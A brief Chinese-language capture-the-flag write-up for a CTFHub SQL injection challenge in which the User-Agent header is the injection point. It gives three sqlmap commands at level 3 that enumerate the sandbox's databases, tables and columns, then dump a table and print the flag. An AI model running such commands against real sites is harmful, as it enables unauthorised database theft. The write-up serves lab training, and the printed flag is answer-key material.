考点
SQL注入 UA注入
问题分析
他直说了UA注入点
可以跟Cookie注入一样弄 BP抓包发包
也可以直接sqlmap -u去跑 这几个题过程差不多 这里就用工具了
因为是UA注入了 所以用level3
python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs
python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T asqmhkqrnf --columns --dump
先是asqmhkqrnf
最后得到flag
flag
ctfhub{38b9e00b109a227eae8a9006}